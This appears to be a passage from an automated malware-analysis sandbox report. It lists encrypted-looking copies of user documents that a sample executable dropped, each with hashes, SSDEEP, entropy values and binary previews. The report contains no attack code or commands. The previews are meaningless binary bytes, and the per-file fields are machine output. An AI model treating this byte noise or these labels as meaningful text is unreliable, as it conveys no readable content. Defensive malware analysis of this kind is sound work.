                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.0112232164394985
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8lrsc+zKSGb3Tp9/qFq6TVLftvOYSWTpaE4z4/pHF+CidpzK8sevWAVgKTaCB7Rf:uscWAbTp9SACZ4YSipszCwgck38R
                                                                                                                                                      MD5:84A5B7E577BB5E3C25AF371C5B07FDED
                                                                                                                                                      SHA1:EDB749CBB643DC5EA04A4070C18DFD088BBFAD78
                                                                                                                                                      SHA-256:BA2502DDF4B4996D5530BFC41EA6B8E56BCEFAE3877B334C3F5EE03D1820F01F
                                                                                                                                                      SHA-512:627FD1AECC8A7D0221F0C258FE66CD160185F12B369E1EE42D64B983E2F6535D2B5DD518A252554CB4EC154DAA4E9BC825045648EF788983F0C8C3E49D284D1B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: B.....=^.lG..b....iXl..2Q..n...g.m..)!.8a.u^IO..e.).n0..L".).|H..>.n*.z..:......s...6.v..5..<.b1fV.Tz..3U...?8.....b .s...Ur.iHq.)...+/ld.|u.*.....|z'x.@....=s..2..(....!..u.......7...u..awW1!o.:6PH...(....3......vd.-V...H.....}..t`.-4B.{..g..n..Hi..1....Q..Z..z./..K),O..:X.&].....U....4.......n>Gg_..F..qJ..P..).....uh..W.......t...5@......../.]&J1.-50r7..A...-..)*.......w......*%......N_.n.....~f_.S.<...&v8...[.?...c..U........EM......v.j..B-W.!_.w..l........+.Ak....j.e...#$..C\b..#h...T.9..=n..7...>...$]#.....u...J.&..q.}.1gw..<.}/.8 .0.<..a.....|.k...h5.. ..z.[..>..8}^..=...N......}..`.u.......T....)M.n.#s......s....7.r.1v*k......yb/uW.I........=....W6..t3.8 .j....B+4E....t...w(d~_...O..i...K{..h.....z...AN..E?.w..&..@.S...@![....>....[._N"..Q.mE0......+:..._'.......W9o_.<..Wx......'.T........et.Ek....Lq..Q...^&.......xmM..6~X.+1..>..[..]....+H^.X..).g..&n..`.|Z./) .|H&...XlEM...Kw. ?....zA#lF4.b....L.8S..;....=.Z.^Xu..R..Q.#wV..\.xy
                                                                                                                                                      C:\Users\user\My Documents\EOWRVPQCCS.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.99290218042401
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:f504y7TEH0kGHsydGXReUpBsdniGwNsq0joUv0HbZj4b9eF/zIDeLq7zK8sevWAs:REUgsydGX0U0Ssb07ZZF0DzCwgck38E
                                                                                                                                                      MD5:D05A8FD1197F4A3B42E16F5B68B32DED
                                                                                                                                                      SHA1:4129F679E76531FD4FA8B25694865F5B77FEF20D
                                                                                                                                                      SHA-256:85F428B70CD893FE138A5F9C9F5743BD64144C87D6FD04404C6DFAA16CAAC93F
                                                                                                                                                      SHA-512:FCEAFA9556EFC46955150CA3ED11F058B24A917134881CC1C882641FEF8B0B826E8D2617FE2C24AAC7768101CEBE8E2D8DB9E5A546257DF264DDE55C578650A1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..JK[...k.F.o..k...9....O2M%.z......mf.0..G...-....b.......zB*A.:k...M.........-..8...6.d........x...3e.A...i...O'.....3......GE[f.du...G^.T.OP..;...A.L..[.9.[N&'.]..6..IQ.q:.E..ol.V...1..1 I..w...Pr-..`.......&.*j&.gLe.x..{.D.{!_...J4E.....>........!.$.i..u..]."...R<V_..5...8...7Z3..wr....f...*..S*RL.&.3,..w.`..v*.R.:..R.WN5..5....GS...#9....8.](J..].8}.0.^>..1..r.;2.Cz..g.BQ...H-.C...cV..."q8..+T).3.z.=y..jA.8u...]>&.U,c..}.............,.>......"X.c........jk...Q.8}.L+......v.%S.h.^I.&...&.iA......C......pc...3Fu:.m..W..V.{\.^.Z..}?..K<.S.n...J .1...%....T.\..f..D.$)J......{`.,M...........I....K.`H9.... )....=0R!.iBi.."n<.......|P...".|...O2./..k..".<..^Pb.....hh\..J...G+G..Ju.0..........2.a....%...mRX6..P...`x{....`.]..]. .}.v.3;...YL.....B.!.m.*.T..J.Z.....K;.y.....j.'".E.<..]...Q.@.x.A.h........0.R.>...........\....b..........M.C.E..`..6|...8m.!..r.V0....j#...... . .i....Hv....pp.M|...@.z....<.wA..xP...Wo....}<.^c,.s.N4....v..[.&..]oE
                                                                                                                                                      C:\Users\user\My Documents\GIGIYTFFYT.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.012616288401591
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:Jj7NGbcE445p5ZwLS1Crq3BoGiqE+s8NPOOPp8gR3zK8sevWAVgKTaCB7RZ0cHYx:1YbjVpHH9vNmOPigRzCwgck382
                                                                                                                                                      MD5:E91814A52C9C868B74DAEC53B8D97A21
                                                                                                                                                      SHA1:F05502E58D000A0EFF0F33E99F836B5C66AD5103
                                                                                                                                                      SHA-256:85902C766EE6B36F171AD57DB2A0102D23257872B0A4B62B67A97A45A2E2DB13
                                                                                                                                                      SHA-512:2CC39A2580DE271440413DB639C2FB0E59E81ABAB45B2B1705A053279977223FE766AD7028D34A5D74F94BB312E4E20ED3A11B6ACAF0C149C5D7A01B8FE116B7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: n.......,../?..\....8......>...p_....1i...w.G.yp...k.dO.."/.....`...,3.p....l...|.x-dc........'.....7..[.....u:..ZEP.,..G.~R..P..LPA\...fD.O.........d6+D|....<...7....r.D..Q..R.9.Z;2%3.`#.Y+......t_;0j...t-1..Z.nm..6.D.cY...<..b....q.*aN...S.R[.b.../rdk.Z...t-....HK.....S.l..<.....m.A$....AH..".O.Z....'.0=.......g.CS.....v6......L..,G>..tS.d.....>p......Y..w..[..x.K.!..)[g.4.D...(...H..N..#.R.,.G....c0........S.'...t..*).......7A.T)u.~.p.Y.cs.D.FtH;x.M.._^<)...FK-+b3.....=s..l....`..l.[J...9.).z..<x.%l..4..+...k.(....G..3.:....G....^......w.v.B^..^%.8|.`I.]]g....ns.%..m...)....^g....8.Mr<:..p<......`]<....#..G.W.+..q.S..y....G....L_>e..".waWf<....h7Z.....-.7..7..2;U]M.@.}2..:|... .r.O...E..ge......._Em..p..`....p....n.:.o..<.)...t..Rt-qOY..d.J.w2..A....4...K......u....2n.?uS..%..e....{........./..jh.\...":.PQ"...S,.!.s..=.."........v...}.mJF...x..*.3......c...@Z.).........q!.Z>.s ....].A..I'..r8...i.c. #.`.+zdpG:(d.............T..s.P;.qE
                                                                                                                                                      C:\Users\user\My Documents\GRXZDKKVDB.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.026898625212568
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ZKcZoLLK5dIYGlY6OdIzHEOUOzCwgck38qYS:ZmKfIYGAdIzkrOzTEL3
                                                                                                                                                      MD5:6D3F6FAD7C8995E5E09887C55A90F508
                                                                                                                                                      SHA1:4B7A6EBDDE47E0F947C96029045347835CA70F86
                                                                                                                                                      SHA-256:9D02F9E703556DB9C8A1B56328B8B314BABD654B6C4FA2376575FD6D71892DFD
                                                                                                                                                      SHA-512:081337609839F30C5E922E69EEE241BB1CB85969A1A46D0E1B6A62C646CC6A3B4106831963D5E67717F61EF1F5F67634D82B1B3D2E021D2A7F72767DF645A32F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .-......~J~u5.F..z5....hJ.>[.5..Ta.n.....7\|..84....K*VL..t...j.~L.Z...yP..T....U.l...,.a.......P.5....Sm$..'.Aj./..~..7.Z...e..C].Z..7....R.L..#B@..n.*U.t@.....I.C..F...Qc~...#P..Q%...x.W......../..:.!A.aT."|..>c...m.v...b..$....c..\.]....".D@.....UT.X.j.....S..d.S.=?9.....s.p.1`L.X......oJG..S+k....)..O|s.gTdYMM.{.$..:.Y.c.V.-+.<.0w.g.0M.m}.-;........^Lt3'@...9....<...g.t...1.]....Q.....M.... ..#..s...,b(/........m........(..2.g._]......9...J<..qk2....6+..U....{?...[......7fA.:...z.uJ...4.......'.3...z..Z0..Z(<.<.~6.h...x....N..^..c.u.6..o.Qha.p;...#.O..LCD.$..b..n.J.....1......Hm...S....M.......T..C*._..8.]Z.*.e..9'.....Z...SK....&.%...z..f...RH.W"k.~....g..;.8..x*..).O...ac.5...........O...' .s./:..#&q.S..8.......?.2lu.On.6=....N......^.l...1..?2..wB....C.L.W.yjo.3.N.oyV...b....t..s8.<..EB...~.#..Gi...~...K..iG.j..3Md....l>4y.El.bn..I.z$......w...._I....k.VE-%......Y... ...R...].V..N.....nk.D.g.0h..Mz.Xj.G<s..A}...S...j....
                                                                                                                                                      C:\Users\user\My Documents\GRXZDKKVDB.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.02785215792494
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:VGY6SyZ4Y1dKzNBWQ2KP5/qXnEVXvQoGWX3zK8sevWAVgKTaCB7RZ0cHYIgtyUzr:VGqyZJdK/X2KP5/qXoXvGS3zCwgck38e
                                                                                                                                                      MD5:A13AD3BDFB602571692B4C4472681E09
                                                                                                                                                      SHA1:321674A5F441D601DB842920A158203F15FED3E6
                                                                                                                                                      SHA-256:237C345BADDE5135CF1138F90816A0D3986D98871341E2172E959F1398627519
                                                                                                                                                      SHA-512:49234236367287A1EBEC63F34D05FB3142921F4108A79D83E5CB2F2CE154B0F6EFA37E75AE728E45A803973C03A8954DFBEB0927C84416B575B24C2E721A3C2B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .*..Yd........}|.Budh.IR.,-U].oa_D{|...Z_/..%.....n..6........8....].N..~.I....y..tK..o.r....(?.\.TnY.7..m.l..b....%...:...Y....l.i.:fp[L..@/...2..N..\r......`\!.i'.F.p...R.Tv...7...HT..8cw.[..K.....N..`.:`A..(.+.2...n[..........[...-..C..#..y..;..n..27@H.w.~...M. ...>...,....=e.[4..o./.&.p..Y.....b~Q3..P-..O1.):...I.......P....v../E.....zQ.@....M.a6...S.Vl....?g8-q........;A..m....?..}..(...hW%K..w4.(G.N........`..E*.Xv.DR.b.i!...A.x.Qzu\./$.NVh....+<T.-WV...4.P..4..`n6.%4...%...A....D..|.. q.&%..ra......m,P...e..../....>...~aw&...m+..;J...=.~_.+.7.......N..J...D..,.E0.Q.]...GS._......C=....sX..R>..LF......>.s.t....5...^......%.bY..;..CcgO~#!.^.v..u...G.;J.....x=E{..R...Hj.j....T."+uO...ZkkJ\....r,.n8_.:.2..v....h.QR....>......Eg(....#t-....,.O.j..\K...j.8^].X......-d..O.....,.".1.1.....k.2..!7i,j.._..|..7.Q.jW.hu.\,....s..z..7..P..t.:.NBW....p.o...}.].BOa..@.<.h.Q!...k...*...v..d..y.\z....{...?~.7*.Cm_.sT....g#.....A.~..)...|u.J.
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.9975657250912695
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:zK0ulIjB3bRT+cdWPNTXuzOAknSr3uvjzCwgck38Rff:MyFAjulgSjuvjzTE43
                                                                                                                                                      MD5:DB9899FDBF675434F3AA992D1E005447
                                                                                                                                                      SHA1:C469FA120661E58FD09A869B580245D4F776A527
                                                                                                                                                      SHA-256:DE7CD84118D8FB30E3F31C013FDD5919A3F4855AFF325CC04E1E68E4D3CF8506
                                                                                                                                                      SHA-512:61697E1E0CDBEA2BC7737409DF3EBCAC77E845F23FA27DA6509FDBC05F31057F7D17043A4BC1C82D79BCD4A503714A751B8309EF19F1095630B7685DD055F5AC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...e#]e....;...9.Fg..i......Q..6.I...^.~H-(/.....+.=...[C.@Dd.%.....\..X.Mq...|.a.........../=../..j.;...#.H.5g..VP..%c.G.......?.#g>..W.J.1..H|$..\.f.t].Fm.&.....{.i.B..C.I.W..I.X...Uk...:.(l..e.s.F.W'..).I.t.~...... .E...I.rt..$..D.`......mW.d....y_..3(I.....CQ...>.3.h...b.R.7.;.r..>a.....a.V.(.b-.$..O.....o^.&P.+N...7Y.........XN.iW....>."..Y$.hV...ZZ..$fk8(....p..yC1s.-..(..;$.....(....4T.]..a.A..XN[....|..x.p.K...K..k.H...r..E.,.....?A.R...~.RVhy...kW..^N.~1..)...$<.5'..3......&5.w..@V3...R[.@......d_.XR.`T.].%.?.3.G>w+.>.. <.(#pZ..*mx...'y....9.h.e..pFs.D.B-....e.....@......K...........q.'.....-,...9....XHJ..l.k.o~...,M...i...]..p*.?:..qq6..F......W.I..a.]2..4.*s8Df.W..W.N:.E..-o(..P......gL..[..0 ...a.....@.)KuI.r.U..^C.... .X~....@..7.W...w.b*.q..3/......K.B..-.k.......p..`.h.f........+....W5.-!..&)!.j2..$.qwo.O.AA...W+Q.A ....2;p...:..$c.Ve.......#Y..:.z....t....M.........n...H..<.WW.....-....2t.b.....1K..c2.?.1..qW...
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.030524595324611
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:JDYpufdtJTfBqVxzW5s6xUJLiNebuSURF1v1Qu4zhaSJ6MqOozK8sevWAVgKTaCV:1JfJfBSxz6LcidRqp1HyzCwgck38n
                                                                                                                                                      MD5:DD7F99446D275000E9D77C33CF06E2F9
                                                                                                                                                      SHA1:43CC07345FF597544AE62BEEED053EE0310F9787
                                                                                                                                                      SHA-256:FADFF681468FDC45FFC35C1AA353795C41AAE30DBC2B821E5F2A3A915E2CA33C
                                                                                                                                                      SHA-512:0A5E4F0076F2EFD9C930E71C0D6B508D23357599070F1612F0DB61F4351899940A2C72C857DFF87FF6FEFE8347168004262BBA6E519F0A7AED268CFB7D067873
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..5.......3mT>.L...z.,V..A...8..g.....8.S..n..!..C.^L%..Y@e>9..]Q[...........`w._.....L....l..,..=hp.g..'#.*.]O..Y.......U....R.6....:)..;#.1..l......\.c.D.o.G.q..x.0!...t..r..m...E6."..o0.i..\..C.....7=xF.km....WX....i...@.$n..G.)M.<...eF..T..3..}+xmoE.q.Z.vc..y/..)SS..).......Q5u{Q.W.[HE.@..Q&..E.....=.......Dd.s.EG,.F-...*..Y............8....~...!'...{..$...Q...$^....W.....hQ.......e..5..4.J..>.A....b...&qD....BT.WD...~.A.9Y.cPS.$...C..s6VC.N&..I..@..Fr`.fB}..qk....R}...Uw...O..!....T?09....q./.n.!....iE.E.U....)...o|TcW.g..2...vp.\...2d.#.1.=.!.....C.V..l.....?........bt...Oz.Y....L.@ \vK.j..JcKg..;..^.%..#..G..{.+..V.r.&".NJG:..`..[...:.4.H.=U........a.D...g..3.t.H.O...f..)d)I#.@...\S........Kf.5.%..@....e.Fgi._....\D..M.....KI.8'.b....j^$.n...o..Z.r.S)Q.T~.'..;.[.wy-1.....@....*...."......~......c.8.. p`.h....F...&..ye.f........]..S.......-..y.X>Rd}.%|XS8:.....(.$C..H.Q.;a.v1...o'...n......E.KJm..GF'..&..d$m.H..p.....C..x..,..V
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL\EIVQSAOTAQ.png.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):6.993822931592102
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:vMUmdhosmWpH8Uy2V623bspBFkC0d3kTCq5Fog01aXmAqzK8sevWAVgKTaCB7RZz:3mPiUy2V6k+BFkC0KDo6XOzCwgck383
                                                                                                                                                      MD5:11FFD902F678CB0A5D50D2F418331E89
                                                                                                                                                      SHA1:4306D34C5F8C5E6D4644D080B329C24A18494AB7
                                                                                                                                                      SHA-256:ACA4FF94A6F7815A33853864614C6BD5B29A5388AB8BCE5258EBBF6C5A0E1C8C
                                                                                                                                                      SHA-512:76AF28C7195446143E65741D38C9CA80CA8C90589C34C3F64B9FC2099FC8875475088BD09AF0142F4969C65BA3460ECBC4B85DF6365B7AC52F525741255770CA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ^..6.i..q:....VimL2;By..1h.n.J.I.....E-.`cq...'..([.u....X.....e}b$..........Y....I8....ipe.V.U.b.Y2..&.5.xV_<A...r0h.B.SW..58...Dk@....sZG....l.].Z...A.>...>...f. ?......x...v..d.6Tm.m.~..SA.|.=..$g..)..........e.3U..Y..h.Q..y.E....@...Z...&:..D[..1.r.W.V.4.^4[..Yfa(...w...i...\..D.NC-A......2U...+.U...s.\.(vx.f}...M..G}....^...n.9..~.......,......)..R..+m...q...v.5..)..D..Ha..mb.../}?.z=..J...9...V..!6.|\5+..[.X.h..-|.....Na.Rq..J....(.(g...t\j.Pc......AfP.4F....hHT>.S%...}.+......R.3.>.K.'....0.?.........l.WJ..;....4.....l.a,.C......W....L%j.)....8Q..?...Q....C..%.m.=....2....5n..h.......'....[....Rpw4.;E.M}..F}..W30..)^EZ@B..`...'.B...s.0ZP..Pq.ED...............m...H.....~Z..W..D[r...^.X"...:E..j...Q...2.....G.L-d..3..~+LW.X8DL..n......D........3..,q..:.ab.A...U...E6...>c.#.3W....D.Z.w...d..@...J/..........E.x......-/`uT..Z....#.f..Hf.D@.#...>.n..e. ..m.dl6.|......t.^..........<.j.. l...!..*.;-.@.n:..^.....<K.s..Ga.z.....G4.v...
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL\EOWRVPQCCS.jpg.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:SysEx File -
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.015236891587946
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:gvVqSCNQue5W753UuS4XmPbw/zSzsZLzCwgck38vYl:gQBQucW9pQbw/zSeLzTEl
                                                                                                                                                      MD5:EE66D524B17DCE3DAD4A02D2A2235CEE
                                                                                                                                                      SHA1:08DBF34A576A17B89B4D58F6C4E8283A64700637
                                                                                                                                                      SHA-256:1364F895EB553452ECF64EAB6546157DF91D73171FDB29FE5EF97690178A2784
                                                                                                                                                      SHA-512:1B326CE8799F510DF9EBB656355511DB65F3C2190484ADD76386641ADBCEB9C91634D587B5836C9B839C45E2B776563E66A1328466B4A1AA509F339E2C087D8D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ._.G.....e>*V.4l..M.l....o{`...Fm-=MiM..=..s.1r.."....;5..r.C....!.N.........-..:.hK.w..,.>..C...F.jPn!.....O.%@.-...nF....j.y... Wy.T..8.I..`......X.N.X.*.../.d.r.%j.9.sv.,...u....d..L.0./.~:.uB/K.(.....g..=.q."c..T...0.....X.....kN~..C.v.I...e.u.l-.:.F.Xz4l..v...r/N".h.... !.-........|..;....}....Cp.c.N....l......P.[p.......q95..XT.~.k(1]v....'r..I.>..9....&.y...@=....9RwsJ....Qx.\A. .?.O.F.X..4j.2,.;.s.(...q...w...1h.....s.6..Q....v.y...r..~m......| .../.A.n..'.G.=Dn.f...j...D.d.*........k.E....~.q...}lW..g...._q.h..bz......x.....&.y.,Q..[a..'2.Z+.*...-......QT...@0<..G..C.8$..q.0k&..}/WI...l...a...IJ.V...G..5Q..xq."..La.h...3...m.G.......X....N+:......L..........[....c.N.7c.q...O.8..p......#..q....IV....L.....6.F.....T...B.....K.........!H.<..V.+...K..._.....@.(....%.....u...7.....~P<.....+..x.Q..e...U..J:.?7..Gt9...tA'x.f...K?D&..%..@,s}-..E......V.z.../~7....9Tx...RWP.^.].......))U.9. 9.q..y .{.j}.T....:....H..<?.q$o"O.AM..5>..Q.
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL\GIGIYTFFYT.mp3.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.0134135726084175
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cjM7w1wHhXsDsmRkY9hy8YLHzfDEcngzCwgck38t:UIw1wHIsmRtOzfYtzTEe
                                                                                                                                                      MD5:73C97724B01345CD97F7399F5C787860
                                                                                                                                                      SHA1:28248B93EFDAD5D0456A65653B36CFF8D26C4923
                                                                                                                                                      SHA-256:D1125DF14A3A92D15B293825CB29393B2F8A477D7C9612BDA1903FF0F87B58F8
                                                                                                                                                      SHA-512:8B7091BC69E4D2639CC40D51A51D89CEA022148210D3E4161FDC3CA5909181B7B8FF2590FFB746C89678011471CCB27CB106CD4BC7CDBD4697E52BB5B0658A93
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ....p.,.6...\1..\..3.(...\..je............E...B....a*..DYHA.7J.d...b8.j...2.....eKc.L.%.:.vS@..a|.BH$Ff~...?.oU6rz.:........W.k%.. ....&.g".D..._.bH..a{....b..(K,....f...m.....|b.. P;.T7.<.o..{........h.i..<..b ....0%......An..Q..zh....6...|........D....Z._.&..r..2. if1.?6t..={....A.....L......T......._!....IY.S.(9...AL.._.....-......J.G}x......'v..@0Q.......,....>.h......XyZ.b.9k....Y0.._..J.....&..l...2.......{H.!.tELl@.._....G.Wdg.6..g..d......U..5.t......:6,#.W^.v..1D.g...&s.L;.3...^..[.1jZ.Is..@.[....-b.......0r|.-.....Ev1..m>{.4._t.v.jq.....2f.....i!!p..gz...l.M...i...0...e.RJ/.T........c2b..3.)R....t....v&2.?.0.1....D..:...h8...%F.#.....,A.U...3...y..."A.A..&.`n....w.........<.....+.=-.l..u......$..4.....:....}.jl...R.... N.M3......6o...Lb..{JS..YW.l..a..L?P^N>h....ZK..QG.j_....*....^#J.p.......:.H........C.....#.....Z&)....ql..y.....g....o*.~.m..X3Z...!O...8O...-..G.&f6g.\.j{/.&k>&...g._]f....).t.}..Xd..Y...$."...ab.FU...TI$.1.N...L.).
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL\GRXZDKKVDB.xlsx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.005287996559887
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:ozz3mR7Keem6Zk39qL+PbV3zCwgck38sW:oze7KTm6Z+U+pzTENW
                                                                                                                                                      MD5:D0609EC16BDD6AC8856638FE2A72D3CE
                                                                                                                                                      SHA1:C9E8F9B6DBD56FB5BA7D431ECF9DC8EE6E4FE02E
                                                                                                                                                      SHA-256:D2FFD0640371F6FBC12365E1E8E24F8E336479B21FF16652A2D44302A9D11D23
                                                                                                                                                      SHA-512:8CC0457735A0D47A58273F973F074EC30E8EBAE9B6A94CBE392BEE740333C5B7349CD3AAD18436E8255E5C9FBF5F9601DE86A509176A47D3191BF79A3F1DF947
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: H$....L..k.w.,PP.....i..k....:.......0...x......\...x|o...R<......h.P.4:..d.P.......s.L....u...6._..V.O.*(.3..l^..T^U4...Yu.%.$.$..E.......(g...;A9....[..-..w..[....L.d4.qZ.9..S..0...yj,.E...e..... .n...v.....&.m.M3g....39......0.'`{..2.I..b.m...Z...;US.o.89.1...|:..#..E..\.. ....\....-....2..c..V..D.*.9Oa..1.H2.;..guc.Z..cU.N....uu.3..M..a.9...P..D..]DE.m.*...JD......".c...~.K:.k...??pK...1r...x...?.z..j.....)HG......`1_..?H.....n.....q~i...U!0.b..VA:....O.z.al"...i/..%..)&.qF..3.......=X....n..(VY....9..@sS...<x.......]T....=r3.XV..}..q..P..*Ya.P.SbU3..L..GOHzd.W.IA..X.N3..GJ@r#.Z....}DF.......X.X......9QG.3...DIg'....g..j.0...?..M>......W(l?..5.m...!lw..[.}F1.S.I......."$.E..K..{......S..-n:....I.)`.....!.Ds.....|..k.x5.z.e]....&.....":%J.......7\,..yg.3..[3...<.....X-......}a?.2....H......~4._.O/F_..Op.d....]e..D..........'FT.u.i.2.X.*...4m:.n....FJ.X..3...fzT=3M3...m....W.r.t.....="ew...V.7.O...V.....O<..B\g....2KG.lL...C...zYQ
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL\NVWZAPQSQL.docx.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.009188114573667
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:aVfgmfpxhme1aVUzt7bKwiKWAtglLt1zCwgck383:QIQpx5zVmrAtAzTEE
                                                                                                                                                      MD5:AD30C0786C4F74C39B8EB6E030012C8E
                                                                                                                                                      SHA1:07FABAAC7DB09B3050C8256C204CD187B62301F0
                                                                                                                                                      SHA-256:1DC7A18CE2B298172B029000A409A184A13E624126DC029177E7A01BF05040E0
                                                                                                                                                      SHA-512:616A1343045FA517A6B0DBF5DE4AC4DF3626DA6C28C8FC2224E8CDB00700C60F90D969A53756D03A25FF149B4D6ADB7AAB09D5BA383C53CA2C964ED145EDAF9A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .$..[Th...`...E.9..V#..1...*M........u..uLa...A..(...D..hN.:W.-..>.uH.GR&.;.I....QP.h#..._.....>..z..$.V..!.........r.&....A...Z..h....!D....7..g].r.._>5..B....WC.Tf4n..[..Y.Y.Tqs.S...Y....d.H~/...[...(...0.2[==P......v.X..V.|..R!..`}......U.FgYv.g.S_.....G.`~.%.abH..r.#@.........W...nA..D.V].`..R./...I....)..\..E...ML*.v.:..ZS.2..i%QG...e..o7.F.q.B..'@b.A.......5(.Q...{.i.I.X....&..z<9...S..w;..4.....mFA(R-,.E..|...U..js..Q../o..96M.^....".-(..4a,..c...-...j.t..g....p.....q..^........&...W....{...6K.`.B[n.)^.|u..Qj-......C*Ij.=xkJ.....reoy.gb..*yW.Y..l..e9..S........!6.....Qq.K...R...R..n._c...Y....r{zm...i...N2.....gh..1$..a(.\.@.;.....I;...|.XCv........r....5.........q\.JL':.B....h..}...A.0*bQ#]...~..E.[.;".....K'..).Q....\.F"T..+.y.!..!n.<^..N....Qt1D\L.W.t...j.v..o..VF.oW..Y....Z\.&..]...A.m..$..a.oNP_.<..z........C).3lg(.|.$.{..&..*V.a...u........-....3V.l...=.....d.D.*..d'.>...'G.....a.-.J...}...T.....5..1.......}.a...>....
                                                                                                                                                      C:\Users\user\My Documents\NVWZAPQSQL\PALRGUCVEH.pdf.xls (copy)
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1984
                                                                                                                                                      Entropy (8bit):7.006879297627094
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:wWwcFyGAwCtK35WQjWKaujrH/zCwgck38RE:OwCtKJWQjWRuHzTEcE
                                                                                                                                                      MD5:D8432CCA7D35B586CA555CDB761B83D8
                                                                                                                                                      SHA1:37522225A2DD5300E8465B441A7B8E07D6B83389
                                                                                                                                                      SHA-256:280312661FAE57AF24028B842B5BBE5113DCA3E0CF10F4714774E210F3047C48
                                                                                                                                                      SHA-512:3DD1A4B870E17F2590FFB9DD15EE6A5E5D9D414545E7C1312967B74DEABE6BE8F312BA7B03DBDDFFB5EBAE5814CFA1827750B6AA97F766003CEF9BA81652A167
                                                                                                                                                      Malicious:false
